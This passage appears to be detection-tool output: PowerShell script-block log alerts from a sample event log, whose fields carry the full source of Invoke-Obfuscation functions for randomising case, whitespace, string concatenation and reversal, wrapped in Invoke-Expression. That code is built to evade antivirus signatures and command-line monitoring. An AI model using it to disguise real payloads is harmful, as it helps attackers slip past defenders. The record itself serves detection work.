# If the current token is greater than 1000 characters (as in SecureString or Base64 strings) then set $ConcatPercent much lower If($InputVal.Length -gt 25000) { $ConcatPercent = Get-Random -Minimum 0.05 -Maximum 0.10 } ElseIf($InputVal.Length -gt 1000) { $ConcatPercent = Get-Random -Minimum 2 -Maximum 4 } Else { $ConcatPercent = Get-Random -Minimum 15 -Maximum 30 } # Convert $ConcatPercent to the exact number of characters to concatenate in the current token. $ConcatCount = [Int]($InputVal.Length*($ConcatPercent/100)) # Guarantee that at least one concatenation will occur. If($ConcatCount -eq 0) { $ConcatCount = 1 } # Select random indexes on which to concatenate. $CharIndexesToConcat = (Get-Random -InputObject (1..($InputVal.Length-1)) -Count $ConcatCount) | Sort-Object # Perform inline concatenation. $LastIndex = 0 ForEach($IndexToObfuscate in $CharIndexesToConcat) { # Extract substring to concatenate with $ObfuscatedToken. $SubString = $InputVal.SubString($LastIndex,$IndexToObfuscate-$LastIndex) # Concatenate with quotes and addition operator. $ObfuscatedToken += $SubString + $Quote + ""+"" + $Quote $LastIndex = $IndexToObfuscate } # Add final substring. $ObfuscatedToken += $InputVal.SubString($LastIndex) $ObfuscatedToken += $FinalSubString # Add final quotes if necessary. If(!($ObfuscatedToken.StartsWith($Quote) -AND $ObfuscatedToken.EndsWith($Quote))) { $ObfuscatedToken = $Quote + $ObfuscatedToken + $Quote } # Remove any existing leading or trailing empty string concatenation. If($ObfuscatedToken.StartsWith(""''+"")) { $ObfuscatedToken = $ObfuscatedToken.SubString(3) } If($ObfuscatedToken.EndsWith(""+''"")) { $ObfuscatedToken = $ObfuscatedToken.SubString(0,$ObfuscatedToken.Length-3) } Return $ObfuscatedToken } Function Out-RandomCase { <# .SYNOPSIS HELPER FUNCTION :: Obfuscates any string or char[] by randomizing its case. 
Invoke-Obfuscation Function: Out-RandomCase Author: Daniel Bohannon (@danielhbohannon) License: Apache License, Version 2.0 Required Dependencies: None Optional Dependencies: None .DESCRIPTION Out-RandomCase obfuscates given input as a helper function to evade detection by simple IOCs and process execution monitoring relying solely on command-line arguments. For the most complete obfuscation all tokens in a given PowerShell script or script block (cast as a string object) should be obfuscated via the corresponding obfuscation functions and desired obfuscation levels in Out-ObfuscatedTokenCommand.ps1. .PARAMETER InputValStr Specifies the string to obfuscate. .PARAMETER InputVal Specifies the char[] to obfuscate. .EXAMPLE C:\PS> Out-RandomCase ""String to have case randomized"" STrINg to haVe caSe RAnDoMIzeD C:\PS> Out-RandomCase ([char[]]""String to have case randomized"") StrING TO HavE CASE randOmIzeD .NOTES This cmdlet is most easily used by passing a script block or file path to a PowerShell script into the Out-ObfuscatedTokenCommand function with the corresponding token type and obfuscation level since Out-ObfuscatedTokenCommand will handle token parsing, reverse iterating and passing tokens into this current function. C:\PS> Out-ObfuscatedTokenCommand {Write-Host 'Hello World!' -ForegroundColor Green; Write-Host 'Obfuscation Rocks!' -ForegroundColor Green} 'Command' 3 This is a personal project developed by Daniel Bohannon while an employee at MANDIANT, A FireEye Company. .LINK http://www.danielbohannon.com #> [CmdletBinding( DefaultParameterSetName = 'InputVal')] Param ( [Parameter(Position = 0, ValueFromPipeline = $True, ParameterSetName = 'InputValStr')] [ValidateNotNullOrEmpty()] [String] $InputValStr, [Parameter(Position = 0, ParameterSetName = 'InputVal')] [ValidateNotNullOrEmpty()] [Char[]] $InputVal ) If($PSBoundParameters['InputValStr']) { # Convert string to char array for easier manipulation. 
$InputVal = [Char[]]$InputValStr } # Randomly convert each character to upper- or lower-case. $OutputVal = ($InputVal | ForEach-Object {If((Get-Random -Minimum 0 -Maximum 2) -eq 0) {([String]$_).ToUpper()} Else {([String]$_).ToLower()}}) -Join '' Return $OutputVal } Function Out-RandomWhitespace { <# .SYNOPSIS Obfuscates operator/groupstart/groupend/statementseparator token by adding random amounts of whitespace before/after the token depending on the token value and its immediate surroundings in the input script. Invoke-Obfuscation Function: Out-RandomWhitespace Author: Daniel Bohannon (@danielhbohannon) License: Apache License, Version 2.0 Required Dependencies: None Optional Dependencies: None .DESCRIPTION Out-RandomWhitespace adds random whitespace before/after a given token and places it back into the provided PowerShell script to evade detection by simple IOCs and process execution monitoring relying solely on command-line arguments. For the most complete obfuscation all tokens in a given PowerShell script or script block (cast as a string object) should be obfuscated via the corresponding obfuscation functions and desired obfuscation levels in Out-ObfuscatedTokenCommand.ps1. .PARAMETER ScriptString Specifies the string containing your payload. .PARAMETER Tokens Specifies the token array containing the token we will obfuscate. .PARAMETER Index Specifies the index of the token to obfuscate. 
.EXAMPLE C:\PS> $ScriptString = ""Write-Host ('Hel'+'lo Wo'+'rld!') -ForegroundColor Green; Write-Host ('Obfu'+'scation Ro'+'cks!') -ForegroundColor Green"" C:\PS> $Tokens = [System.Management.Automation.PSParser]::Tokenize($ScriptString,[ref]$null) C:\PS> For($i=$Tokens.Count-1; $i -ge 0; $i--) {If(($Tokens[$i].Type -eq 'Operator') -OR ($Tokens[$i].Type -eq 'GroupStart') -OR ($Tokens[$i].Type -eq 'GroupEnd')) {$ScriptString = Out-RandomWhitespace $ScriptString $Tokens $i}} C:\PS> $ScriptString Write-Host ('Hel'+ 'lo Wo' + 'rld!') -ForegroundColor Green; Write-Host ( 'Obfu' +'scation Ro' + 'cks!') -ForegroundColor Green .NOTES This cmdlet is most easily used by passing a script block or file path to a PowerShell script into the Out-ObfuscatedTokenCommand function with the corresponding token type and obfuscation level since Out-ObfuscatedTokenCommand will handle token parsing, reverse iterating and passing tokens into this current function. C:\PS> Out-ObfuscatedTokenCommand {Write-Host ('Hel'+'lo Wo'+'rld!') -ForegroundColor Green; Write-Host ('Obfu'+'scation Ro'+'cks!') -ForegroundColor Green} 'RandomWhitespace' 1 This is a personal project developed by Daniel Bohannon while an employee at MANDIANT, A FireEye Company. .LINK http://www.danielbohannon.com #> [CmdletBinding()] Param ( [Parameter(Position = 0, Mandatory = $True)] [ValidateNotNullOrEmpty()] [String] $ScriptString, [Parameter(Position = 1, Mandatory = $True)] [ValidateNotNullOrEmpty()] [System.Management.Automation.PSToken[]] $Tokens, [Parameter(Position = 2, Mandatory = $True)] [ValidateNotNullOrEmpty()] [Int] $Index ) $Token = $Tokens[$Index] $ObfuscatedToken = $Token.Content # Do not add DEFAULT setting in below Switch block. 
Switch($Token.Content) { '(' {$ObfuscatedToken = $ObfuscatedToken + ' '*(Get-Random -Minimum 0 -Maximum 3)} ')' {$ObfuscatedToken = ' '*(Get-Random -Minimum 0 -Maximum 3) + $ObfuscatedToken} ';' {$ObfuscatedToken = ' '*(Get-Random -Minimum 0 -Maximum 3) + $ObfuscatedToken + ' '*(Get-Random -Minimum 0 -Maximum 3)} '|' {$ObfuscatedToken = ' '*(Get-Random -Minimum 0 -Maximum 3) + $ObfuscatedToken + ' '*(Get-Random -Minimum 0 -Maximum 3)} '+' {$ObfuscatedToken = ' '*(Get-Random -Minimum 0 -Maximum 3) + $ObfuscatedToken + ' '*(Get-Random -Minimum 0 -Maximum 3)} '=' {$ObfuscatedToken = ' '*(Get-Random -Minimum 0 -Maximum 3) + $ObfuscatedToken + ' '*(Get-Random -Minimum 0 -Maximum 3)} '&' {$ObfuscatedToken = ' '*(Get-Random -Minimum 0 -Maximum 3) + $ObfuscatedToken + ' '*(Get-Random -Minimum 0 -Maximum 3)} '.' { # Retrieve character in script immediately preceding the current token If($Index -eq 0) {$PrevChar = ' '} Else {$PrevChar = $ScriptString.SubString($Token.Start-1,1)} # Only add randomized whitespace to . if it is acting as a standalone invoke operator (either at the beginning of the script or immediately preceded by ; or whitespace) If(($PrevChar -eq ' ') -OR ($PrevChar -eq ';')) {$ObfuscatedToken = ' '*(Get-Random -Minimum 0 -Maximum 3) + $ObfuscatedToken + ' '*(Get-Random -Minimum 0 -Maximum 3)} } } # Add the obfuscated token back to $ScriptString. $ScriptString = $ScriptString.SubString(0,$Token.Start) + $ObfuscatedToken + $ScriptString.SubString($Token.Start+$Token.Length) Return $ScriptString } Function Out-RemoveComments { <# .SYNOPSIS Obfuscates variable token by removing all comment tokens. This is primarily since A/V uses strings in comments as part of many of their signatures for well known PowerShell scripts like Invoke-Mimikatz. 
Invoke-Obfuscation Function: Out-RemoveComments Author: Daniel Bohannon (@danielhbohannon) License: Apache License, Version 2.0 Required Dependencies: None Optional Dependencies: None .DESCRIPTION Out-RemoveComments obfuscates a given token by removing all comment tokens from the provided PowerShell script to evade detection by simple IOCs or A/V signatures based on strings in PowerShell script comments. For the most complete obfuscation all tokens in a given PowerShell script or script block (cast as a string object) should be obfuscated via the corresponding obfuscation functions and desired obfuscation levels in Out-ObfuscatedTokenCommand.ps1. .PARAMETER ScriptString Specifies the string containing your payload. .PARAMETER Token Specifies the token to obfuscate. .EXAMPLE C:\PS> $ScriptString = ""`$Message1 = 'Hello World!'; Write-Host `$Message1 -ForegroundColor Green; `$Message2 = 'Obfuscation Rocks!'; Write-Host `$Message2 -ForegroundColor Green #COMMENT"" C:\PS> $Tokens = [System.Management.Automation.PSParser]::Tokenize($ScriptString,[ref]$null) | Where-Object {$_.Type -eq 'Comment'} C:\PS> For($i=$Tokens.Count-1; $i -ge 0; $i--) {$Token = $Tokens[$i]; $ScriptString = Out-RemoveComments $ScriptString $Token} C:\PS> $ScriptString $Message1 = 'Hello World!'; Write-Host $Message1 -ForegroundColor Green; $Message2 = 'Obfuscation Rocks!'; Write-Host $Message2 -ForegroundColor Green .NOTES This cmdlet is most easily used by passing a script block or file path to a PowerShell script into the Out-ObfuscatedTokenCommand function with the corresponding token type and obfuscation level since Out-ObfuscatedTokenCommand will handle token parsing, reverse iterating and passing tokens into this current function. 
C:\PS> Out-ObfuscatedTokenCommand {$Message1 = 'Hello World!'; Write-Host $Message1 -ForegroundColor Green; $Message2 = 'Obfuscation Rocks!'; Write-Host $Message2 -ForegroundColor Green #COMMENT} 'Comment' 1 This is a personal project developed by Daniel Bohannon while an employee at MANDIANT, A FireEye Company. .LINK http://www.danielbohannon.com #> [CmdletBinding()] Param ( [Parameter(Position = 0, Mandatory = $True)] [ValidateNotNullOrEmpty()] [String] $ScriptString, [Parameter(Position = 1, Mandatory = $True)] [ValidateNotNullOrEmpty()] [System.Management.Automation.PSToken] $Token ) # Remove current Comment token. $ScriptString = $ScriptString.SubString(0,$Token.Start) + $ScriptString.SubString($Token.Start+$Token.Length) Return $ScriptString }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-31 03:15:55.243 +09:00,SEC511,4104,high,Exec,Malicious PowerShell Keywords,,../hayabusa-rules/sigma/powershell/powershell_script/posh_ps_malicious_keywords.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-31 03:15:55.243 +09:00,SEC511,4104,high,ResDev,Relevant Anti-Virus Event,,../hayabusa-rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-31 03:15:55.243 +09:00,SEC511,4104,high,Exec,Malicious PowerShell Commandlets,,../hayabusa-rules/sigma/powershell/powershell_script/posh_ps_malicious_commandlets.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-31 03:15:55.249 +09:00,SEC511,4104,medium,,Potentially Malicious PwSh,"# This file is part of Invoke-Obfuscation. 
# # Copyright 2017 Daniel Bohannon <@danielhbohannon> # while at Mandiant # # Licensed under the Apache License, Version 2.0 (the ""License""); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an ""AS IS"" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. Function Out-ObfuscatedStringCommand { <# .SYNOPSIS Master function that orchestrates the application of all string-based obfuscation functions to provided PowerShell script. Invoke-Obfuscation Function: Out-ObfuscatedStringCommand Author: Daniel Bohannon (@danielhbohannon) License: Apache License, Version 2.0 Required Dependencies: Out-EncapsulatedInvokeExpression (located in Out-ObfuscatedStringCommand.ps1) Optional Dependencies: None .DESCRIPTION Out-ObfuscatedStringCommand orchestrates the application of all string-based obfuscation functions (casting ENTIRE command to a string a performing string obfuscation functions) to provided PowerShell script to evade detection by simple IOCs and process execution monitoring relying solely on command-line arguments. If no $ObfuscationLevel is defined then Out-ObfuscatedStringCommand will automatically choose a random obfuscation level. The available ObfuscationLevel/function mappings are: 1 --> Out-StringDelimitedAndConcatenated 2 --> Out-StringDelimitedConcatenatedAndReordered 3 --> Out-StringReversed .PARAMETER ScriptBlock Specifies a scriptblock containing your payload. .PARAMETER Path Specifies the path to your payload. .PARAMETER ObfuscationLevel (Optional) Specifies the obfuscation level for the given input PowerShell payload. 
If not defined then Out-ObfuscatedStringCommand will automatically choose a random obfuscation level. The available ObfuscationLevel/function mappings are: 1 --> Out-StringDelimitedAndConcatenated 2 --> Out-StringDelimitedConcatenatedAndReordered 3 --> Out-StringReversed .EXAMPLE C:\PS> Out-ObfuscatedStringCommand {Write-Host 'Hello World!' -ForegroundColor Green; Write-Host 'Obfuscation Rocks!' -ForegroundColor Green} 1 IEX ((('Write-H'+'ost x'+'lcHello'+' Wor'+'ld!xlc -F'+'oregroundC'+'o'+'lor Gre'+'en'+'; Write-Host '+'xlcObf'+'u'+'sc'+'ation '+'Rocks!xl'+'c'+' '+'-'+'Foregrou'+'nd'+'C'+'olor Green') -Replace 'xlc',[Char]39) ) C:\PS> Out-ObfuscatedStringCommand {Write-Host 'Hello World!' -ForegroundColor Green; Write-Host 'Obfuscation Rocks!' -ForegroundColor Green} 2 IEX( ((""{17}{1}{6}{19}{14}{3}{5}{13}{16}{11}{20}{15}{10}{12}{2}{4}{8}{18}{7}{9}{0}"" -f ' Green','-H',' ',' ','R','-Foregr','ost qR9He','!qR9 -Foregr','o','oundColor','catio',' ','n','oundColor','qR9','bfus',' Green; Write-Host','Write','cks','llo World!','qR9O')).Replace('qR9',[String][Char]39)) C:\PS> Out-ObfuscatedStringCommand {Write-Host 'Hello World!' -ForegroundColor Green; Write-Host 'Obfuscation Rocks!' -ForegroundColor Green} 3 $I4 =""noisserpxE-ekovnI|)93]rahC[]gnirtS[,'1Yp'(ecalpeR.)'ne'+'erG roloCd'+'nuo'+'rgero'+'F- 1'+'Y'+'p!s'+'kcoR'+' noit'+'a'+'cs'+'ufbO'+'1'+'Yp '+'tsoH'+'-etirW'+' ;'+'neer'+'G '+'rol'+'oCdnu'+'orger'+'o'+'F'+'-'+' 1'+'Yp'+'!dlroW '+'olleH1Yp '+'t'+'s'+'oH-et'+'irW'( "" ;$I4[ -1 ..- ($I4.Length ) ] -Join '' | Invoke-Expression .NOTES Out-ObfuscatedStringCommand orchestrates the application of all string-based obfuscation functions (casting ENTIRE command to a string a performing string obfuscation functions) to provided PowerShell script to evade detection by simple IOCs and process execution monitoring relying solely on command-line arguments. 
If no $ObfuscationLevel is defined then Out-ObfuscatedStringCommand will automatically choose a random obfuscation level. This is a personal project developed by Daniel Bohannon while an employee at MANDIANT, A FireEye Company. .LINK http://www.danielbohannon.com #> [CmdletBinding( DefaultParameterSetName = 'FilePath')] Param ( [Parameter(Position = 0, ValueFromPipeline = $True, ParameterSetName = 'ScriptBlock')] [ValidateNotNullOrEmpty()] [ScriptBlock] $ScriptBlock, [Parameter(Position = 0, ParameterSetName = 'FilePath')] [ValidateNotNullOrEmpty()] [String] $Path, [ValidateSet('1', '2', '3')] [Parameter(Position = 1)] [ValidateNotNullOrEmpty()] [Int] $ObfuscationLevel = (Get-Random -Input @(1..3)) # Default to random obfuscation level if $ObfuscationLevel isn't defined ) # Either convert ScriptBlock to a String or convert script at $Path to a String. If($PSBoundParameters['Path']) { Get-ChildItem $Path -ErrorAction Stop | Out-Null $ScriptString = [IO.File]::ReadAllText((Resolve-Path $Path)) } Else { $ScriptString = [String]$ScriptBlock } # Set valid obfuscation levels for current token type. $ValidObfuscationLevels = @(0,1,2,3) # If invalid obfuscation level is passed to this function then default to highest obfuscation level available for current token type. If($ValidObfuscationLevels -NotContains $ObfuscationLevel) {$ObfuscationLevel = $ValidObfuscationLevels | Sort-Object -Descending | Select-Object -First 1} Switch($ObfuscationLevel) { 0 {Continue} 1 {$ScriptString = Out-StringDelimitedAndConcatenated $ScriptString} 2 {$ScriptString = Out-StringDelimitedConcatenatedAndReordered $ScriptString} 3 {$ScriptString = Out-StringReversed $ScriptString} default {Write-Error ""An invalid `$ObfuscationLevel value ($ObfuscationLevel) was passed to switch block for String Obfuscation.""; Exit} } Return $ScriptString } Function Out-StringDelimitedAndConcatenated { <# .SYNOPSIS Generates delimited and concatenated version of input PowerShell command. 
Invoke-Obfuscation Function: Out-StringDelimitedAndConcatenated Author: Daniel Bohannon (@danielhbohannon) License: Apache License, Version 2.0 Required Dependencies: Out-ConcatenatedString (located in Out-ObfuscatedTokenCommand.ps1), Out-EncapsulatedInvokeExpression (located in Out-ObfuscatedStringCommand.ps1), Out-RandomCase (located in Out-ObfuscatedToken.ps1) Optional Dependencies: None .DESCRIPTION Out-StringDelimitedAndConcatenated delimits and concatenates an input PowerShell command. The purpose is to highlight to the Blue Team that there are more novel ways to encode a PowerShell command other than the most common Base64 approach. .PARAMETER ScriptString Specifies the string containing your payload. .PARAMETER PassThru (Optional) Outputs the option to not encapsulate the result in an invocation command. .EXAMPLE C:\PS> Out-StringDelimitedAndConcatenated ""Write-Host 'Hello World!' -ForegroundColor Green; Write-Host 'Obfuscation Rocks!' -ForegroundColor Green"" (('Write-Ho'+'s'+'t'+' {'+'0'+'}'+'Hell'+'o Wor'+'l'+'d!'+'{'+'0'+'} -Foreground'+'Color G'+'ree'+'n; Writ'+'e-'+'H'+'ost {0}Obf'+'usc'+'a'+'tion R'+'o'+'ck'+'s!{'+'0} -Fo'+'reg'+'ro'+'undColor'+' '+'Gree'+'n')-F[Char]39) | Invoke-Expression .NOTES This cmdlet is most easily used by passing a script block or file path to a PowerShell script into the Out-ObfuscatedStringCommand function with the corresponding obfuscation level since Out-Out-ObfuscatedStringCommand will handle calling this current function where necessary. C:\PS> Out-ObfuscatedStringCommand {Write-Host 'Hello World!' -ForegroundColor Green; Write-Host 'Obfuscation Rocks!' -ForegroundColor Green} 1 This is a personal project developed by Daniel Bohannon while an employee at MANDIANT, A FireEye Company. 
.LINK http://www.danielbohannon.com #> [CmdletBinding()] Param ( [Parameter(Position = 0)] [ValidateNotNullOrEmpty()] [String] $ScriptString, [Switch] $PassThru ) # Characters we will substitute (in random order) with randomly generated delimiters. $CharsToReplace = @('$','|','`','\','""',""'"") $CharsToReplace = (Get-Random -Input $CharsToReplace -Count $CharsToReplace.Count) # If $ScriptString does not contain any characters in $CharsToReplace then simply return as is. $ContainsCharsToReplace = $FALSE ForEach($CharToReplace in $CharsToReplace) { If($ScriptString.Contains($CharToReplace)) { $ContainsCharsToReplace = $TRUE Break } } If(!$ContainsCharsToReplace) { # Concatenate $ScriptString as a string and then encapsulate with parentheses. $ScriptString = Out-ConcatenatedString $ScriptString ""'"" $ScriptString = '(' + $ScriptString + ')' If(!$PSBoundParameters['PassThru']) { # Encapsulate in necessary IEX/Invoke-Expression(s). $ScriptString = Out-EncapsulatedInvokeExpression $ScriptString } Return $ScriptString } # Characters we will use to generate random delimiters to replace the above characters. # For simplicity do NOT include single- or double-quotes in this array. $CharsToReplaceWith = @(0..9) $CharsToReplaceWith += @('a','b','c','d','e','f','g','h','i','j','k','l','m','n','o','p','q','r','s','t','u','v','w','x','y','z') $CharsToReplaceWith += @('A','B','C','D','E','F','G','H','I','J','K','L','M','N','O','P','Q','R','S','T','U','V','W','X','Y','Z') $DelimiterLength = 3 # Multi-dimensional table containing delimiter/replacement key pairs for building final command to reverse substitutions. $DelimiterTable = @() # Iterate through and replace each character in $CharsToReplace in $ScriptString with randomly generated delimiters. ForEach($CharToReplace in $CharsToReplace) { If($ScriptString.Contains($CharToReplace)) { # Create random delimiter of length $DelimiterLength with characters from $CharsToReplaceWith. 
If($CharsToReplaceWith.Count -lt $DelimiterLength) {$DelimiterLength = $CharsToReplaceWith.Count} $Delim = (Get-Random -Input $CharsToReplaceWith -Count $DelimiterLength) -Join '' # Keep generating random delimiters until we find one that is not a substring of $ScriptString. While($ScriptString.ToLower().Contains($Delim.ToLower())) { $Delim = (Get-Random -Input $CharsToReplaceWith -Count $DelimiterLength) -Join '' If($DelimiterLength -lt $CharsToReplaceWith.Count) { $DelimiterLength++ } } # Add current delimiter/replacement key pair for building final command to reverse substitutions. $DelimiterTable += , @($Delim,$CharToReplace) # Replace current character to replace with the generated delimiter $ScriptString = $ScriptString.Replace($CharToReplace,$Delim) } } # Add random quotes to delimiters in $DelimiterTable. $DelimiterTableWithQuotes = @() ForEach($DelimiterArray in $DelimiterTable) { $Delimiter = $DelimiterArray[0] $OriginalChar = $DelimiterArray[1] # Randomly choose between a single quote and double quote. $RandomQuote = Get-Random -InputObject @(""'"",""`"""") # Make sure $RandomQuote is opposite of $OriginalChar contents if it is a single- or double-quote. If($OriginalChar -eq ""'"") {$RandomQuote = '""'} Else {$RandomQuote = ""'""} # Add quotes. $Delimiter = $RandomQuote + $Delimiter + $RandomQuote $OriginalChar = $RandomQuote + $OriginalChar + $RandomQuote # Add random quotes to delimiters in $DelimiterTable. $DelimiterTableWithQuotes += , @($Delimiter,$OriginalChar) } # Reverse the delimiters when building back out the reversing command. [Array]::Reverse($DelimiterTable) # Select random method for building command to reverse the above substitutions to execute the original command. # Avoid using the -f format operator (switch option 3) if curly braces are found in $ScriptString. 
If(($ScriptString.Contains('{')) -AND ($ScriptString.Contains('}'))) { $RandomInput = Get-Random -Input (1..2) } Else { $RandomInput = Get-Random -Input (1..3) } # Randomize the case of selected variable syntaxes. $StringStr = Out-RandomCase 'string' $CharStr = Out-RandomCase 'char' $ReplaceStr = Out-RandomCase 'replace' $CReplaceStr = Out-RandomCase 'creplace' Switch($RandomInput) { 1 { # 1) .Replace $ScriptString = ""'"" + $ScriptString + ""'"" $ReversingCommand = """" ForEach($DelimiterArray in $DelimiterTableWithQuotes) { $Delimiter = $DelimiterArray[0] $OriginalChar = $DelimiterArray[1] # Randomly decide if $OriginalChar will be displayed in ASCII representation or plaintext in $ReversingCommand. # This is to allow for simpler string manipulation on the command line. # Place priority on handling if $OriginalChar is a single- and double-quote. If($OriginalChar[1] -eq ""'"") { $OriginalChar = ""[$StringStr][$CharStr]39"" $Delimiter = ""'"" + $Delimiter.SubString(1,$Delimiter.Length-2) + ""'"" } ElseIf($OriginalChar[1] -eq '""') { $OriginalChar = ""[$StringStr][$CharStr]34"" } Else { If(Get-Random -Input (0..1)) { $OriginalChar = ""[$StringStr][$CharStr]"" + [Int][Char]$OriginalChar[1] } } # Randomly select if $Delimiter will be displayed in ASCII representation instead of plaintext in $ReversingCommand. If(Get-Random -Input (0..1)) { # Convert $Delimiter string into a concatenation of [Char] representations of each characters. # This is to avoid redundant replacement of single quotes if this function is run numerous times back-to-back. $DelimiterCharSyntax = """" For($i=1; $i -lt $Delimiter.Length-1; $i++) { $DelimiterCharSyntax += ""[$CharStr]"" + [Int][Char]$Delimiter[$i] + '+' } $Delimiter = '(' + $DelimiterCharSyntax.Trim('+') + ')' } # Add reversing commands to $ReversingCommand. $ReversingCommand = "".$ReplaceStr($Delimiter,$OriginalChar)"" + $ReversingCommand } # Concatenate $ScriptString as a string and then encapsulate with parentheses. 
$ScriptString = Out-ConcatenatedString $ScriptString ""'"" $ScriptString = '(' + $ScriptString + ')' # Add reversing commands to $ScriptString. $ScriptString = $ScriptString + $ReversingCommand } 2 { # 2) -Replace/-CReplace $ScriptString = ""'"" + $ScriptString + ""'"" $ReversingCommand = """" ForEach($DelimiterArray in $DelimiterTableWithQuotes) { $Delimiter = $DelimiterArray[0] $OriginalChar = $DelimiterArray[1] # Randomly decide if $OriginalChar will be displayed in ASCII representation or plaintext in $ReversingCommand. # This is to allow for simpler string manipulation on the command line. # Place priority on handling if $OriginalChar is a single- or double-quote. If($OriginalChar[1] -eq '""') { $OriginalChar = ""[$CharStr]34"" } ElseIf($OriginalChar[1] -eq ""'"") { $OriginalChar = ""[$CharStr]39""; $Delimiter = ""'"" + $Delimiter.SubString(1,$Delimiter.Length-2) + ""'"" } Else { $OriginalChar = ""[$CharStr]"" + [Int][Char]$OriginalChar[1] } # Randomly select if $Delimiter will be displayed in ASCII representation instead of plaintext in $ReversingCommand. If(Get-Random -Input (0..1)) { # Convert $Delimiter string into a concatenation of [Char] representations of each characters. # This is to avoid redundant replacement of single quotes if this function is run numerous times back-to-back. $DelimiterCharSyntax = """" For($i=1; $i -lt $Delimiter.Length-1; $i++) { $DelimiterCharSyntax += ""[$CharStr]"" + [Int][Char]$Delimiter[$i] + '+' } $Del",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-31 03:15:55.249 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"# This file is part of Invoke-Obfuscation. # # Copyright 2017 Daniel Bohannon <@danielhbohannon> # while at Mandiant # # Licensed under the Apache License, Version 2.0 (the ""License""); # you may not use this file except in compliance with the License. 
# You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an ""AS IS"" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. Function Out-ObfuscatedStringCommand { <# .SYNOPSIS Master function that orchestrates the application of all string-based obfuscation functions to provided PowerShell script. Invoke-Obfuscation Function: Out-ObfuscatedStringCommand Author: Daniel Bohannon (@danielhbohannon) License: Apache License, Version 2.0 Required Dependencies: Out-EncapsulatedInvokeExpression (located in Out-ObfuscatedStringCommand.ps1) Optional Dependencies: None .DESCRIPTION Out-ObfuscatedStringCommand orchestrates the application of all string-based obfuscation functions (casting ENTIRE command to a string a performing string obfuscation functions) to provided PowerShell script to evade detection by simple IOCs and process execution monitoring relying solely on command-line arguments. If no $ObfuscationLevel is defined then Out-ObfuscatedStringCommand will automatically choose a random obfuscation level. The available ObfuscationLevel/function mappings are: 1 --> Out-StringDelimitedAndConcatenated 2 --> Out-StringDelimitedConcatenatedAndReordered 3 --> Out-StringReversed .PARAMETER ScriptBlock Specifies a scriptblock containing your payload. .PARAMETER Path Specifies the path to your payload. .PARAMETER ObfuscationLevel (Optional) Specifies the obfuscation level for the given input PowerShell payload. If not defined then Out-ObfuscatedStringCommand will automatically choose a random obfuscation level. 
The available ObfuscationLevel/function mappings are: 1 --> Out-StringDelimitedAndConcatenated 2 --> Out-StringDelimitedConcatenatedAndReordered 3 --> Out-StringReversed .EXAMPLE C:\PS> Out-ObfuscatedStringCommand {Write-Host 'Hello World!' -ForegroundColor Green; Write-Host 'Obfuscation Rocks!' -ForegroundColor Green} 1 IEX ((('Write-H'+'ost x'+'lcHello'+' Wor'+'ld!xlc -F'+'oregroundC'+'o'+'lor Gre'+'en'+'; Write-Host '+'xlcObf'+'u'+'sc'+'ation '+'Rocks!xl'+'c'+' '+'-'+'Foregrou'+'nd'+'C'+'olor Green') -Replace 'xlc',[Char]39) ) C:\PS> Out-ObfuscatedStringCommand {Write-Host 'Hello World!' -ForegroundColor Green; Write-Host 'Obfuscation Rocks!' -ForegroundColor Green} 2 IEX( ((""{17}{1}{6}{19}{14}{3}{5}{13}{16}{11}{20}{15}{10}{12}{2}{4}{8}{18}{7}{9}{0}"" -f ' Green','-H',' ',' ','R','-Foregr','ost qR9He','!qR9 -Foregr','o','oundColor','catio',' ','n','oundColor','qR9','bfus',' Green; Write-Host','Write','cks','llo World!','qR9O')).Replace('qR9',[String][Char]39)) C:\PS> Out-ObfuscatedStringCommand {Write-Host 'Hello World!' -ForegroundColor Green; Write-Host 'Obfuscation Rocks!' -ForegroundColor Green} 3 $I4 =""noisserpxE-ekovnI|)93]rahC[]gnirtS[,'1Yp'(ecalpeR.)'ne'+'erG roloCd'+'nuo'+'rgero'+'F- 1'+'Y'+'p!s'+'kcoR'+' noit'+'a'+'cs'+'ufbO'+'1'+'Yp '+'tsoH'+'-etirW'+' ;'+'neer'+'G '+'rol'+'oCdnu'+'orger'+'o'+'F'+'-'+' 1'+'Yp'+'!dlroW '+'olleH1Yp '+'t'+'s'+'oH-et'+'irW'( "" ;$I4[ -1 ..- ($I4.Length ) ] -Join '' | Invoke-Expression .NOTES Out-ObfuscatedStringCommand orchestrates the application of all string-based obfuscation functions (casting ENTIRE command to a string a performing string obfuscation functions) to provided PowerShell script to evade detection by simple IOCs and process execution monitoring relying solely on command-line arguments. If no $ObfuscationLevel is defined then Out-ObfuscatedStringCommand will automatically choose a random obfuscation level. 
